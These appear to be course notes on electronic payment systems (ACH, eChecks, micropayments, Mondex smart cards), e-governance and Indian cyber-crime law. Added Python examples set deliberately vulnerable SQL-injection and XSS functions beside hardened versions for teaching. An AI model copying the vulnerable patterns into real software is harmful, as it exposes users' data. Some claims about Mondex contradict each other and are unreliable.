The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize electronic debit, and enters bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards bank routing number and account number to processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. Processor forwards approve/decline results to CyberSource.
5. CyberSource returns approval/decline message to merchant.
6. If approved, CyberSource routes check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as micropayment method, is emerging to cater for very low value transactions. Examples:

• Millicent (pre-payment/credit based)
• PayWord (post-payment)


MICRO PAYMENT IS -

• Very small payments made over the Web
• Transactions too small for credit cards
• Can be as little as a fraction of a cent
• Alternative to subscription and advertising
• Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

• Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
• Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
• Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
• Credit card: Payment by credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).
• Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

• Publishing
• Marketing
• Software
• Entertainment
• Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate-based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

• Standard credit card-sized, with a microchip embedded on it
• Two types:
  – Memory-only chips
  – Microprocessor chips
• Can hold up to 32,000 bytes
• Newer smart cards have math co-processors
  – Perform complex encryption routines quickly
• In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –


Why Smart Cards –

• Improve the convenience and security of any transaction
• Provide tamper-proof storage of user and account identity
• Provide vital components of system security
• Protect against a full range of security threats

Advantages –

• Flexibility
• Security
• Portability
• Increasing data storage capacity
• Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

• Ticketless travel
  – Seoul bus system: 4M cards, 1B transactions since 1996
  – Planned for the SF Bay Area system
• Authentication, ID
• Medical records
• Ecash
• Store loyalty programs
• Personal profiles
• Government
• Licenses
• Mall parking
• Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

• Direct transfer of electronic money between two cards
• Transfer of electronic money over the Internet or telephone networks, etc.
• Keeps transaction records
• Password protection and "lock card" functions
• Portable balance finder to check balance
• Supports multiple currencies


ADVANTAGES

CONSUMER –

• Convenience
• Accessibility
• On-chip record of recent transactions
• Home load
• Internet purchases

MERCHANT –

• Reliable off-line payment
• Higher security
• Low transaction cost
• Reduced cash handling

FINANCIAL INSTITUTION –

• Strengthen customer relationships
• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy –

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information


Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos, between applications (ITSEC 6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks: Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions

overflow can occur as a result of limited memory in the Mondex smart-cards This means that

PREPARED BY ARUN PRATAP SINGH 42

42

significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a

critical design flaw making it difficult for Mondex to reliably detect fraud

While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate

minor fraud loss

Mondex believes their electronic payment system is secure They are convinced that critics who

have voice concern over security issues are mistaken and misinformed Perhaps the use of a

Mondex smart card depends on a personal level of trust
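The overflow problem described above, as an added example that is not Mondex's own code or protocol: a toy purse card keeps only a rolling log of its last 10 offline transactions, and the bank side detects lost entries from gaps in a per-card sequence counter. The sequence counter, the `PurseCard` and `BankAuditor` names, and the sample card values are assumptions made for illustration.

```python
from collections import deque

# Added example (not Mondex's own code): a stored-value card with a bounded
# transaction log, and the bank-side check that detects entries lost to overflow.

LOG_CAPACITY = 10  # the notes describe a rolling log of 10 transactions


class PurseCard:
    """Constructed model: balance plus a bounded log of offline transactions."""

    def __init__(self, card_id, balance):
        self.card_id = card_id
        self.balance = balance
        self.seq = 0                              # assumed per-card transaction counter
        self.log = deque(maxlen=LOG_CAPACITY)     # oldest entry is silently dropped when full

    def pay_offline(self, amount, retailer):
        """Card-to-retailer transfer with no network contact; returns the sequence number."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient value on card")
        self.balance -= amount
        self.seq += 1
        self.log.append({"seq": self.seq, "amount": amount, "retailer": retailer})
        return self.seq

    def upload(self):
        """Hand whatever the card still retains to the bank (e.g. at an ATM) and clear it."""
        entries = list(self.log)
        self.log.clear()
        return entries


class BankAuditor:
    """Bank side: rebuilds each card's history from uploads and flags missing transactions."""

    def __init__(self):
        self.last_seq = {}   # card_id -> highest sequence number seen so far
        self.history = {}    # card_id -> all entries received

    def ingest(self, card_id, entries):
        """Returns the sequence numbers that never arrived (empty list = complete audit trail)."""
        expected = self.last_seq.get(card_id, 0) + 1
        missing = []
        for entry in entries:
            if entry["seq"] > expected:
                missing.extend(range(expected, entry["seq"]))
            expected = entry["seq"] + 1
        self.history.setdefault(card_id, []).extend(entries)
        if entries:
            self.last_seq[card_id] = entries[-1]["seq"]
        return missing


def demo_overflow(n_purchases):
    """Make n offline purchases without uploading, then upload once.

    Returns (missing_sequence_numbers, entries_received): once n exceeds the log
    capacity, the earliest purchases are gone before the bank ever sees them.
    """
    card = PurseCard("CARD-0001", 500)   # constructed sample card
    bank = BankAuditor()
    for i in range(n_purchases):
        card.pay_offline(5, "retailer-%d" % i)
    entries = card.upload()
    return bank.ingest(card.card_id, entries), len(entries)
```

A card that uploads before every tenth purchase produces a gap-free trail; the gap list is what a fraud-detection process would alert on.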

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back-office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India in PPP-based e-governance projects; each project involved mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services such as Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, public key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community, the providers of goods and services, to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private
  – Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition, For and In the Market

The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits

• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps

• Crafting the Partnership
• Implementing the Partnership

Project Management: Six Distinct Phases

1. Genesis
   • What's the need?
   • What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
   • Is there a need for a Public/Private Partnership?
   • Preliminary project definition

2. Feasibility
   • Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
   • Market research
   • Economic/Financial analysis
   • Program, budget and schedule
   • Risk analysis

3. Plan and Test
   • Final project definition
   • What is the best way to complete the project?
   • Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
   • Master schedule/budget
   • Political climate
   • Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
   • How do you choose and contract with the best-value private partner?
   • What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
   • What do current statutes allow?
   • Procurement approach: Sole Source, RFP, Low Bid
   • Risk allocation between public and private partners
   • Structuring of contract: risks and rewards

5. Implement
   • Environmental
   • Design
   • Permitting
   • Construction
   • Commissioning and administration

6. Operate
   • Startup
   • Monitoring
   • Assessment
   • Enhancement
   • Contract modifications
   • Contract renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and is thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS;
• continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
• Authorization: the capability to grant access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: the capability to prevent unauthorized access to information.
• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
• Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in that event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and systems software, including input-output units.
• Protecting software applications used to process personal data.
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been adequately addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented cyber attacks use techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial-of-service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research work found 816 e-Government websites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
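The two weaknesses just named, each shown in its vulnerable and its hardened form, as an added example that is not code from any e-Government portal or from the research cited: a citizen lookup built by string concatenation beside the parameterized query, and an unescaped HTML greeting beside the escaped one. The table, the sample records and the function names are constructed for illustration; the verification probe is the textbook tautology that any SQL-injection regression test uses.

```python
import html
import sqlite3

# Added example (constructed, not a real portal): SQL injection and XSS in their
# vulnerable and hardened forms, plus a check that tells the two lookups apart.

SAMPLE_CITIZENS = [          # constructed sample data
    ("Asha Verma", "ID-1001"),
    ("Rahul Mehta", "ID-1002"),
]


def make_db():
    """In-memory stand-in for a portal's citizen database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (name TEXT, national_id TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?)", SAMPLE_CITIZENS)
    return conn


def lookup_vulnerable(conn, national_id):
    """SQL injection: the input is spliced into the SQL text, so a quote in the
    input changes the structure of the query instead of being compared as data."""
    sql = "SELECT name FROM citizens WHERE national_id = '" + national_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, national_id):
    """Hardened form: the value travels separately from the SQL text, so whatever
    the input contains is only ever compared against the column."""
    sql = "SELECT name FROM citizens WHERE national_id = ?"
    return [row[0] for row in conn.execute(sql, (national_id,))]


def render_greeting_vulnerable(name):
    """XSS: a submitted or stored name is echoed into the page unescaped, so any
    markup it contains is interpreted by the visitor's browser."""
    return "<p>Welcome, " + name + "</p>"


def render_greeting_escaped(name):
    """Hardened form: HTML-escape before embedding, so markup in the value is
    displayed as literal text."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


def injection_changes_result(conn, probe):
    """Regression check: the same input must give the same rows from both lookups.
    A difference means the concatenated query let the input alter the WHERE clause."""
    return lookup_vulnerable(conn, probe) != lookup_parameterized(conn, probe)
```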

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages

CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected. (Section 43)

• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

